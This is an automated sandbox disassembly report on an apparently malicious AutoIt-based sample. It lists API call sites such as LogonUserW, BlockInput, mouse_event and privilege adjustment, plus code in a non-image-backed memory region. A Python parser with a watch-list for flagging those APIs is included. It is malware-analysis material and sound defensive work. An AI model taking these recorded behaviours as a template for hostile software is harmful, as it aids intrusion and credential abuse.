                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AB8851), ref: 00AB8728
                                                      • CloseHandle.KERNEL32(?,?,00AB8851), ref: 00AB873A
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A88F97,?,?,?,00000001), ref: 00A8A39A
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00A8A3A3
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      APIs
                                                      • __time64.LIBCMT ref: 00AC8B25
                                                        • Part of subcall function 00A8543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00AC91F8,00000000,?,?,?,?,00AC93A9,00000000,?), ref: 00A85443
                                                        • Part of subcall function 00A8543A: __aulldiv.LIBCMT ref: 00A85463
                                                      Similarity
                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                      • String ID:
                                                      • API String ID: 2893107130-0
                                                      APIs
                                                      • BlockInput.USER32(00000001), ref: 00AD4218
                                                      Similarity
                                                      • API ID: BlockInput
                                                      • String ID:
                                                      • API String ID: 3456056419-0
                                                      APIs
                                                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00AC4F18
                                                      Similarity
                                                      • API ID: mouse_event
                                                      • String ID:
                                                      • API String ID: 2434400541-0
                                                      APIs
                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00AB88D1), ref: 00AB8CB3
                                                      Similarity
                                                      • API ID: LogonUser
                                                      • String ID:
                                                      • API String ID: 1244722697-0
                                                      • Opcode ID: 39b7de4e5d9d1e9ffcf4ae86dff03dafac8794573f3cebf2e37a17e6182a1205
                                                      • Instruction ID: e0d9ddd44266c3255b4d32c0be2f024e41491de28f25b92ba84badb0b0b22df1
                                                      • Opcode Fuzzy Hash: 39b7de4e5d9d1e9ffcf4ae86dff03dafac8794573f3cebf2e37a17e6182a1205
                                                      • Instruction Fuzzy Hash: E0D05E3226050EAFEF019EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00AA2242
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID:
                                                      • API String ID: 2645101109-0
                                                      • Opcode ID: a798694a602b098e880597d629ac6ba1d545423ae0dd96a3644722ae4c8a2674
                                                      • Instruction ID: 3edc19debc89aac6415c020fc073ba1d37b0143d8d2b6ff31d5c4efb16112a63
                                                      • Opcode Fuzzy Hash: a798694a602b098e880597d629ac6ba1d545423ae0dd96a3644722ae4c8a2674
                                                      • Instruction Fuzzy Hash: 5CC048F1800109EBDB05EBA0DA88DEEB7BCAB08305F2040A6A102F2180E7749B448B71
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00A8A36A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 8b1f6e60d06d1788b58be21b6989e128c1c59ba39f9a091913ab26afdd67e1ae
                                                      • Instruction ID: a5e9e9b488945c8ec732cf06b3efa03c0b4933147736b44239337124700e05ca
                                                      • Opcode Fuzzy Hash: 8b1f6e60d06d1788b58be21b6989e128c1c59ba39f9a091913ab26afdd67e1ae
                                                      • Instruction Fuzzy Hash: D7A0113000020EAB8A002B82EC08888BFACEA002A0B008020F80C880228B32A8228A80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 60b5e2cc9c1d84e54993e890530487a89cddae593030f88c78039c98286f756c
                                                      • Instruction ID: 1bc9ba2b20b8f7c8ca2ac43b19f791331306bdf03ebe1e0b808bb30aa98827b2
                                                      • Opcode Fuzzy Hash: 60b5e2cc9c1d84e54993e890530487a89cddae593030f88c78039c98286f756c
                                                      • Instruction Fuzzy Hash: CD223831E41616CBDF298B24C9987BD77B5EF41340F68C46AD84A8B292DF3C9D81DB60
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                      • Instruction ID: eb0a44863e1ffd22e06cfb90e0fd15258d6b50390b2af27b6ef785f3ed8c0902
                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                      • Instruction Fuzzy Hash: 7DC183322051A30ADF2D573A943423EBAE55EA27B131A076EE4B3CB5D4FF24D925D720
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                      • Instruction ID: 13049ee97f6ccb4093fbe5beced7439f0f133314024e0c4b2a87e22f4a0d59b9
                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                      • Instruction Fuzzy Hash: 1DC182322051A309DF6D573A843423EBBE15FA27B131A076EE4B2DB5D4EF24D925E720
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction ID: 78872bf357d90fbe5a8786674a2b667d6027be084c1d88797e7641f03cc8a0b0
                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction Fuzzy Hash: 7FC195322051A309DF2D5739D43413EBBE95AA27B131A0B6EE4B3CB5D4EF24D926D710
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction ID: 73b5d006b4d3a479d28b78202b73ac22d6260a9b7fa1fd5194d4fccbc50b65d6
                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction Fuzzy Hash: F041C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                      • Instruction ID: 96a41bbd466e54172d8126653791e5937374a11b316d61018fb4f8874d35676b
                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                      • Instruction Fuzzy Hash: 3E019278A01209EFCB45EF98C5909AEF7B5FB48710F2485D9D809A7701D730EE41DB80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                      • Instruction ID: 1f18df39597290a3d79eb19a84275c3b21e03e4dcb868a630b499c6344dd7098
                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                      • Instruction Fuzzy Hash: 1B018078A05209EFCB45EF98C5909AEF7B5FB48710B2485D9D809A7701D730EE41DB80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00AD7B70
                                                      • DeleteObject.GDI32(00000000), ref: 00AD7B82
                                                      • DestroyWindow.USER32 ref: 00AD7B90
                                                      • GetDesktopWindow.USER32 ref: 00AD7BAA
                                                      • GetWindowRect.USER32(00000000), ref: 00AD7BB1
                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00AD7CF2
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00AD7D02
                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7D4A
                                                      • GetClientRect.USER32(00000000,?), ref: 00AD7D56
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00AD7D90
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7DB2
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7DC5
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7DD0
                                                      • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7DD9
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7DE8
                                                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7DF1
                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7DF8
                                                      • GlobalFree.KERNEL32(00000000), ref: 00AD7E03
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7E15
                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00AF2CAC,00000000), ref: 00AD7E2B
                                                      • GlobalFree.KERNEL32(00000000), ref: 00AD7E3B
                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00AD7E61
                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00AD7E80
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7EA2
                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD808F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                      • API String ID: 2211948467-2373415609
                                                      • Opcode ID: 8c506479b0e283f8c6ca620dc618724355865025bd2f767fd1fcc96f6399aaea
                                                      • Instruction ID: b8e8af37f7ca2f367cc55156ed1cedc45f985a625f1e55ed98e5cdba0c1bd55b
                                                      • Opcode Fuzzy Hash: 8c506479b0e283f8c6ca620dc618724355865025bd2f767fd1fcc96f6399aaea
                                                      • Instruction Fuzzy Hash: B3027B71900259EFDF14DFA4CD89EAE7BB9FB48310F148159F916AB2A1DB70AD01CB60
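The blocks in this section follow one fixed layout per recovered function: an optional APIs list of call sites (name, module, argument snapshot, and the address of the call), the memory region the code was lifted from (with the report's own "based on PE" flag, which is false for the 03D80000 region and true for the image at 00A60000), and the Similarity fields that identify the function across reports. That regularity makes the section machine-readable, which is how a triager would actually use it: list every function that touches LogonUserW or GetUserNameW, and every function that lives in a region not backed by a loaded image. The parser and watch-list below are an added example written for this page, not Joe Sandbox tooling; SAMPLE is a constructed, abbreviated copy of three of the blocks shown above, and the WATCHLIST annotations are the editor's own reading of those APIs, not something the report states.

```python
"""Added example, not Joe Sandbox code: parse the per-function blocks of a Joe Sandbox
"Disassembly" section and triage them. SAMPLE is a constructed, abbreviated copy of three blocks."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Call-site line: "• Name.MODULE(args), ref: ADDR"; parens are optional, and lines lifted
# from a callee carry a "Part of subcall function X:" prefix.
API_RE = re.compile(r"^• (?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?(?P<name>\w+)\.(?P<mod>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^• Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
FIELD_RE = re.compile(r"^• (?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
                      r"Opcode Fuzzy Hash|Instruction Fuzzy Hash): ?(?P<val>.*)$")
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")

@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                          # call-site address inside the dump
    args: str = ""
    subcall_of: Optional[str] = None  # callee address for "Part of subcall function" lines

@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    source_file: str = ""
    offset: str = ""                  # base address of the dumped region
    pe_backed: Optional[bool] = None  # the report's "based on PE" flag
    fields: dict = field(default_factory=dict)  # Similarity fields (API ID, Opcode ID, ...)

    @property
    def first_call_site(self) -> Optional[str]:
        """Lowest direct call-site address, a stand-in for where the function lives."""
        refs = [int(a.ref, 16) for a in self.apis if a.subcall_of is None]
        return f"{min(refs):08X}" if refs else None

def parse_blocks(text: str) -> list:
    """Split the section into FunctionBlocks. A block closes at its 'Instruction Fuzzy Hash'
    line (the last Similarity field printed); text before the first header is skipped."""
    blocks, cur, section = [], FunctionBlock(), None
    for raw in text.splitlines():
        line = raw.strip()            # the report is heavily indented
        if line in SECTIONS:
            section = line
        elif section == "APIs" and (m := API_RE.match(line)):
            cur.apis.append(ApiCall(m["name"], m["mod"], m["ref"].upper(), m["args"] or "", m["sub"]))
        elif section == "Memory Dump Source" and (m := SRC_RE.match(line)):
            cur.source_file, cur.offset, cur.pe_backed = m["file"], m["off"].upper(), m["pe"] == "true"
        elif section == "Similarity" and (m := FIELD_RE.match(line)):
            cur.fields[m["key"]] = m["val"].strip()
            if m["key"] == "Instruction Fuzzy Hash":
                blocks.append(cur)
                cur, section = FunctionBlock(), None
    return blocks

def api_sequence(block: FunctionBlock) -> list:
    """Distinct directly-called APIs in call-site order (subcall lines excluded)."""
    return list(dict.fromkeys(a.name for a in block.apis if a.subcall_of is None))

# Assumption: the editor's own reading of what is worth flagging in this report.
WATCHLIST = {"LogonUserW": "logon with supplied credentials",
             "GetUserNameW": "reads the current user name",
             "mouse_event": "injects synthetic mouse input",
             "SetUnhandledExceptionFilter": "installs a top-level exception filter"}

def triage(blocks: list, watchlist: dict = WATCHLIST) -> list:
    """One finding per block that calls a watch-listed API or was lifted from a region
    the report marks 'based on PE: false' (code not backed by a loaded image)."""
    findings = []
    for i, b in enumerate(blocks):
        reasons = [f"code in non-PE-backed region at {b.offset}"] if b.pe_backed is False else []
        reasons += [f"{a.name} at {a.ref}: {watchlist[a.name]}" for a in b.apis if a.name in watchlist]
        if reasons:
            findings.append({"index": i, "call_site": b.first_call_site,
                             "opcode_id": b.fields.get("Opcode ID", ""), "reasons": reasons})
    return findings

SAMPLE = """\
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00AB88D1), ref: 00AB8CB3
Memory Dump Source
• Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
Similarity
• API ID: LogonUser
• Opcode ID: 39b7de4e5d9d1e9ffcf4ae86dff03dafac8794573f3cebf2e37a17e6182a1205
• Instruction Fuzzy Hash: E0D05E3226050EAFEF019EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60
Memory Dump Source
• Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
Similarity
• Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
• Instruction Fuzzy Hash: F041C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB40
APIs
• DestroyWindow.USER32 ref: 00AD7B90
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AD7D4A
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00AF2CAC,00000000), ref: 00AD7E2B
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00AD7E80
Strings
Memory Dump Source
• Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
Similarity
• String ID: $AutoIt v3$DISPLAY$static
• Instruction Fuzzy Hash: B3027B71900259EFDF14DFA4CD89EAE7BB9FB48310F148159F916AB2A1DB70AD01CB60
"""
```

Feed the whole Disassembly section to parse_blocks and the findings list is the triage table: the two ADVAPI32 functions come out on the watch-list, the 03D80000 blocks come out as non-image-backed code, and the AutoIt splash-window function (CreateWindowExW with the "AutoIt v3" class, OleLoadPicture, SendMessageW) is left alone because it is runtime GUI code. Because the section on this page starts mid-block, the parser skips everything up to the first section header; extend WATCHLIST with whatever APIs matter for the case at hand.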
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,00AEF910), ref: 00AE38AF
                                                      • IsWindowVisible.USER32(?), ref: 00AE38D3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpperVisibleWindow
                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                      • API String ID: 4105515805-45149045
                                                      • Opcode ID: 984a947e3805967f956a16474b070ef76a5b9f9c8129d78fc9feb3537877baff
                                                      • Instruction ID: 387a7ba0ac6d439a2eb9900576a64fdb15029b5ef8120a3f22e4d2b475d02201
                                                      • Opcode Fuzzy Hash: 984a947e3805967f956a16474b070ef76a5b9f9c8129d78fc9feb3537877baff
                                                      • Instruction Fuzzy Hash: 5BD150322043459FCF54EF11C655EAEB7E6AF98344F548458B8865B3A3CB31EE4ACB81
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 00AEA89F
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00AEA8D0
                                                      • GetSysColor.USER32(0000000F), ref: 00AEA8DC
                                                      • SetBkColor.GDI32(?,000000FF), ref: 00AEA8F6
                                                      • SelectObject.GDI32(?,?), ref: 00AEA905
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00AEA930
                                                      • GetSysColor.USER32(00000010), ref: 00AEA938
                                                      • CreateSolidBrush.GDI32(00000000), ref: 00AEA93F
                                                      • FrameRect.USER32(?,?,00000000), ref: 00AEA94E
                                                      • DeleteObject.GDI32(00000000), ref: 00AEA955
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00AEA9A0
                                                      • FillRect.USER32(?,?,?), ref: 00AEA9D2
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00AEA9FD
                                                        • Part of subcall function 00AEAB60: GetSysColor.USER32(00000012), ref: 00AEAB99
                                                        • Part of subcall function 00AEAB60: SetTextColor.GDI32(?,?), ref: 00AEAB9D
                                                        • Part of subcall function 00AEAB60: GetSysColorBrush.USER32(0000000F), ref: 00AEABB3
                                                        • Part of subcall function 00AEAB60: GetSysColor.USER32(0000000F), ref: 00AEABBE
                                                        • Part of subcall function 00AEAB60: GetSysColor.USER32(00000011), ref: 00AEABDB
                                                        • Part of subcall function 00AEAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AEABE9
                                                        • Part of subcall function 00AEAB60: SelectObject.GDI32(?,00000000), ref: 00AEABFA
                                                        • Part of subcall function 00AEAB60: SetBkColor.GDI32(?,00000000), ref: 00AEAC03
                                                        • Part of subcall function 00AEAB60: SelectObject.GDI32(?,?), ref: 00AEAC10
                                                        • Part of subcall function 00AEAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00AEAC2F
                                                        • Part of subcall function 00AEAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AEAC46
                                                        • Part of subcall function 00AEAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00AEAC5B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                      • String ID:
                                                      • API String ID: 4124339563-0
                                                      • Opcode ID: 8326bfc5a4085384f24a2a65c394cb156a931c8f893fc8640af16ebf63825337
